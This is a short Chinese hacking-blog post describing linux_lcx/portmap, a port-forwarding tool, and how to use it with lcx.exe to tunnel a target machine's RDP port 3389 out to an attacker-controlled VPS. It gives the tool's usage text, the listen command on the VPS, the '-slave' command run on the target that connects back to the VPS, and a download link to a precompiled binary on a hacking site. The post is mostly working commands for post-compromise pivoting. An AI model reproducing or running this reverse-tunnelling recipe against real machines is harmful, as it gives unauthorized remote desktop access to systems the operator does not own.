linux_lcx

http://www.hackblog.cn/post/62.html
找了挺多都是编译都是报错的,不过还是找到一个编译好的。

使用环境:
当手上只有linux,然后想通过它来转发一下再连接一下3389

vpsip:8.8.8.8
aimip:1.1.1.1

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2
Let me exit...all overd

监听vpsip的2333端口,然后转发给3389端口
./portmap -m 2 -p1 2333 -p2 3389

再在aimip上面执行,将aimip的3389转发到vpsip的2333上面
lcx.exe -slave 8.8.8.8 2333 127.0.0.1 3389

然后直接mstsc去连接8.8.8.8:3389

下载地址:
http://www.hackblog.cn/zb_users/upload/2015/02/201502111423733343281208.rar

posted @ 2016-01-21 00:57  l3m0n  阅读(946)  评论(0编辑  收藏  举报